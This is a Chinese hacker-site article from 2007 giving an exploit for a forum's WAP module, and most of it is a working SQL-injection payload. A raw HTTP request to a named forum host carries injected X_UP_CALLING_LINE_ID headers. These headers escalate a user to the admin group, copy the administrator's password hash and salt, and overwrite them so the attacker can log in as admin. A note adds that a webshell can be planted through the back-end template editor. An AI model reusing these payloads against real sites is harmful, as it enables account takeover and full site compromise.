黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 黑客入侵 >> 文章正文
[推荐]魔力论坛最新漏洞利用
      ★★★★★
魔力论坛最新漏洞利用
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-4-7
GET /wap/associate.php?do=1 HTTP/1.1
Host: bbs.hongse.net.cn
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Cookie: userid=48855; password=6ef89f8c97b9d6a3599e521712de7903; cpcollapseprefs=;redbbsuserid=48855;redbbspassword=6ef89f8c97b9d6a3599e521712de7903;
X_UP_CALLING_LINE_ID: 0',usergroupid='2' where id='25502'/*
Cookie2: $Version=1
Connection: Keep-Alive
X_UP_CALLING_LINE_ID: 0',yahoo=CONCAT_WS('|',password,salt) where id='1'/*
把id为1的用户的password和salt备份去了yahoo,以|为分割线
X_UP_CALLING_LINE_ID: 0',password='你的密码',salt='你的salt' where id='1'/*
把你的密码和你的Salt替换成ID为1的密码和salt,然后你就可以用你的密码登陆前后台.

PS.后台模板处可以写webshell.
文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    渗透心得04-07
    魔力论坛最新漏洞利用04-07
    织梦内容管理系统(DEDECMS)3.X04-07
    asp.dll解析成system提升权限04-06
    webshell+serv-u获取系统最高权限04-06
    一次完全利用社会工程学的域名劫03-28
    利用DNS欺骗在局域网中挂马03-21
    渗透某资源网站笔记03-20
    渗透同学学校网络03-20
    针对虚拟主机提升权限的实现03-20
    利用QQ文件共享漏洞入侵 Windows03-20
    冠龙科技企业网站管理系统V8.0 安02-07
    相 关 文 章
  • PjBlog 最新上传漏洞利用

  • 织梦内容管理系统(DEDECMS)3.X+4.X上

  • dxbbs漏洞(通杀7.3以前所有版本)

  • Vista+谷歌拼音输入法重现输入法漏洞

  • 利用微软动画光标漏洞的复合型蠕虫现身

  • ANI 漏洞第三方补丁被破[附新的第三方补

  • QQ Traveler漏洞分析与利用(0day)

  • 对于最近几天的IE新漏洞临时解决方法

  • 跨站通杀漏洞:支持最新的phpwind等论坛

  • 全面解析百度XSS跨站漏洞

  • Wordpress 2.1.2 以及之前版本物理路径

  • 利用DNS欺骗在局域网中挂马

    • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886